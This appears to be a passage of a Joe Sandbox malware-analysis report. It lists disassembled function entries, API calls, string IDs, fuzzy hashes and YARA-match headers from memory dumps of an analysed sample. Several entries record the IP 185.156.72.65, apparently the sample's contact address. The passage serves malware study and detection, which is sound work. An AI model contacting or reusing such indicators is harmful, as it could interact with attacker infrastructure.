                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 2296764815-2656946096
                    • Opcode ID: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                    • Instruction ID: 35b52d446d861aa170816ff75a143a42135cfe1fbea8b7bbecd3f4fad1973d83
                    • Opcode Fuzzy Hash: 5c5045922954c3457701567e6a6c9e3e1ad7be9ff9027362e03c1bac20b5626a
                    • Instruction Fuzzy Hash: E32137B0F002859EDB14EFA4D9557A97BB0EB01308F90017EE4457B3A2D7B85985CB5D
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00401194
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 2296764815-2656946096
                    • Opcode ID: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                    • Instruction ID: 080c8299786e9307901dd30be4a7bf730519a23c54167f024b5206933e891779
                    • Opcode Fuzzy Hash: d4edda98fe8d358c67ce7c8865cf0bbf8e120b8e7e0123c9594653d9c3c5ac19
                    • Instruction Fuzzy Hash: 5E217CB0F002409ACB24EFA4E8257A97BB0FF04308F50027EE5056B3D2D7B82945CB5D
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004012A4
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 2296764815-2656946096
                    • Opcode ID: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                    • Instruction ID: f3bdde1b4a8bc64e2f46b2d629ea0fd90e9d23492dc14d44f4e24dc008f4330a
                    • Opcode Fuzzy Hash: 03769d53c3af616b68b676de3282a5896e4960c6caaa03750b9c6d119f5d353c
                    • Instruction Fuzzy Hash: BA212274F002459ADB14FFA8E8157A97BB0BB00308F9041BED512BB2E2D7786901CB5D
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 0495150B
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 4132704954-2656946096
                    • Opcode ID: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                    • Instruction ID: b68f67b4c00690e181e770163d78a84ca3d00b31a65fe517a41e0cacc1b0a450
                    • Opcode Fuzzy Hash: be6c719825c284f158df54f744c121145a8f163f6f071af473cd966bd4c0dd79
                    • Instruction Fuzzy Hash: 6521D4B4F002059AEB24EFB8E9157A87BB0AF05308FA141B9C9239B2B1D7756506CB59
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 049512EB
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 4132704954-2656946096
                    • Opcode ID: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                    • Instruction ID: 9e702a3d0036c6607689573dba1b7483ecbe6d04646fe19d8000a92ab8bf8a80
                    • Opcode Fuzzy Hash: 7e78777c7f8c15a49dcdc04fede0bd4176c739fbcff90974db9594e6dc6bcbe4
                    • Instruction Fuzzy Hash: 5A2137B0F00245DEEB14EFA8E9167A87BB0EB01308FA00179D84567360D7B56549CB5D
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 049513FB
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65$185.156.72.65
                    • API String ID: 4132704954-2656946096
                    • Opcode ID: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                    • Instruction ID: a02c709b0203582cfdba942107a8ff52fd0862dd8be4265b390dd0447ed87fa5
                    • Opcode Fuzzy Hash: 8a8fe8d317b662227fd327a90130799ce29107c4e0518a32c3058f42c24412ec
                    • Instruction Fuzzy Hash: 9321F5B0F00244DAEB24EFA4E9257A87BB0EF41308FA002B9DC055B260D7B56545CB59
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004084EE
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: G@ZK$[@G_
                    • API String ID: 2296764815-2338778587
                    • Opcode ID: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                    • Instruction ID: 2d9fbaa08c13fc83b2f5e0005e6d1fa5ae776f13101647786266d8808d8cc77d
                    • Opcode Fuzzy Hash: 83c89cb96f0188348aa664fe5a3b9a2307e547b5dfc0b364f734f744eaf6d0b1
                    • Instruction Fuzzy Hash: F501DB70F00285DFC710EBB9AD41969B7A0A719310BA1417EE526BB3D2EA79AC01CB4D
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00407EEE
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: G@ZK$[@G_
                    • API String ID: 2296764815-2338778587
                    • Opcode ID: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                    • Instruction ID: 86c78c31387f24dba649c5f85d45a7e4d1f1fe09f4149f0eb9c238fce71b3fdb
                    • Opcode Fuzzy Hash: 9d937272391ced5062343f2fa694021c1e821d7a0b24c59750c86be7e58ed2ae
                    • Instruction Fuzzy Hash: D601D6F0F05244DBD720DBA9AC41A6AB7B0AB09304F9005BAF51977792DA396C41CB49
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04958755
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: G@ZK$[@G_
                    • API String ID: 4132704954-2338778587
                    • Opcode ID: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                    • Instruction ID: b6d9e5f69eea9796bea2d87498c86624bd5840650b0f6347fdc5e806259f9cb9
                    • Opcode Fuzzy Hash: c5541afd9278791e683032a0605f61e379c7bee72b326041da17bc8a9c68a871
                    • Instruction Fuzzy Hash: 4D01D6B0F00244DFDB10EFB8AC41969B7B0A759314BB00679D936AB2A0DB75B9058B45
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04958155
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: G@ZK$[@G_
                    • API String ID: 4132704954-2338778587
                    • Opcode ID: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                    • Instruction ID: 70e303a494107c807b5c4bbdc7990226a0e9e82326240ab6145931cc99123ab7
                    • Opcode Fuzzy Hash: 3643e019afddb0ded186ab5a90822b7330a81e91dcde7fa05791cd6361697cb6
                    • Instruction Fuzzy Hash: 0001D6F1F41204DBE720EFA8AC41A69B7B0AB59314FB006B9E91957370DB3568458B45
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00407899
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: @G@K$A@K.
                    • API String ID: 2296764815-2457859030
                    • Opcode ID: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                    • Instruction ID: 02867bdc75deabfbdae8ac7f1914e191d6f0b036ba1bc0e64f50d331b9525a60
                    • Opcode Fuzzy Hash: 94f704d5fcaaa4a6a86cea28288e2267e04fc7853d895301023c40d4626a8c24
                    • Instruction Fuzzy Hash: 94016271F042049BC710DF58E946A58B7B0EB48304F60417BE906A7392D779AE418B5D
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004079A9
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: @G@K$ZYA.
                    • API String ID: 2296764815-4236202813
                    • Opcode ID: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                    • Instruction ID: d8be7bc43f2ac3a424769131d28bfe1308d6783f1b1820d008cdb8cd51ef09c0
                    • Opcode Fuzzy Hash: 2083bbc37204df75ae5e3194cbdbfa2277e554d398516f573e64da7e7003365e
                    • Instruction Fuzzy Hash: D3018174F04248DFCB24EFA8E992A5CBBB0AB04300F90417BE915A7392D6786D01CB5D
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00406E39
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: ZF\K$three
                    • API String ID: 2296764815-3094064056
                    • Opcode ID: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                    • Instruction ID: 29344792781c46cc919c6541bc41426b34b2da4dd82bbb0e7b349b67a9b0c42f
                    • Opcode Fuzzy Hash: d0f8a07ab7cfa26798f6e4e5872bddee28ed568160f4df47330400ac7d4580cc
                    • Instruction Fuzzy Hash: DF01D134F04204DBCB20DFA9E882B9CB3B0EB04314FA0017AED06A7391DA385D42DB4D
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 049570A0
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: ZF\K$three
                    • API String ID: 4132704954-3094064056
                    • Opcode ID: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                    • Instruction ID: 60cf2a7dc68a29c70edabd6d98aedb78c32db83a2db6c897080f8ef949d90416
                    • Opcode Fuzzy Hash: d97624d9c83104853a490e783dfff4d2631947f354aaa65fd626d83f5661df9f
                    • Instruction Fuzzy Hash: BF016974F04208EBDB20DFE9E981B4CB3B0AB54754FB041BADD15A73A0D6746A06DB19
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04957B00
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: @G@K$A@K.
                    • API String ID: 4132704954-2457859030
                    • Opcode ID: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                    • Instruction ID: 38221bc8e8a54746fba994961db8364b5d67c5f54a5ce43662c162bd3be8d830
                    • Opcode Fuzzy Hash: a83cbf7a01367588a88915ca0a2ca858a472c895f782e2ee7495506aef916c1c
                    • Instruction Fuzzy Hash: 320181B0F00204DFD720DFA8E946A5C77B0E749304FB001BADD16A73A0D775AA458B59
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04957C10
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: @G@K$ZYA.
                    • API String ID: 4132704954-4236202813
                    • Opcode ID: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                    • Instruction ID: 1213575038c523a82ef544637b8d7b5647d95631f7cf84cebd34dcb3e32a8c94
                    • Opcode Fuzzy Hash: e0e011dd5bc5313defc92a44cb7491cb40592dbe2e3934c573b23a31aa141d8c
                    • Instruction Fuzzy Hash: CF018174F00304DFDB24EFA8E991A5C7BF0AB44314FA041BADD2557360D6757945CB49
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 00406C99
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: CGV.$mix
                    • API String ID: 2296764815-1644454629
                    • Opcode ID: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                    • Instruction ID: 24033b3836d6b4f620cd462d172ded2aeb793c2235c3ef6269eb5d899298d204
                    • Opcode Fuzzy Hash: 748439c7c3e09b0f3fc712733e62b7b7dbd043bc03440ddc61534c02d70abd55
                    • Instruction Fuzzy Hash: 2AF062B0F082049BDB10EBA9E982E5877A0AB45314FA4017AE906A77D2D6386D418B5D
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04956F00
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: CGV.$mix
                    • API String ID: 4132704954-1644454629
                    • Opcode ID: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                    • Instruction ID: 0ace2dae8a327e575a5f5fe3e1d4c52e27c4eb285322fb79163cc70e8265dc82
                    • Opcode Fuzzy Hash: 5dae890d2176cd9c71f813253ec21c7a890b77e07cc8d6e19f72d9632b318c6d
                    • Instruction Fuzzy Hash: 70F096B0F44204DBDB10EFA8F942E5C77E0AB45324FF00175ED06973A0D63479458B59
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: 6~}$HE1y$^gc.$kAW
                    • API String ID: 0-3217522955
                    • Opcode ID: f4503167a584a05d14af2ebeab9b4cf456da1b9aefabc1b9f74a0038b6a93745
                    • Instruction ID: 8f6a285a24f091bb6219de6c5e6e6f2659b047165cad1918ac912a7f88a2084c
                    • Opcode Fuzzy Hash: f4503167a584a05d14af2ebeab9b4cf456da1b9aefabc1b9f74a0038b6a93745
                    • Instruction Fuzzy Hash: 6A4123B3B082045FE3045A7EEC5573ABBD9EBD4760F2B063DEA81C3B80E57698058756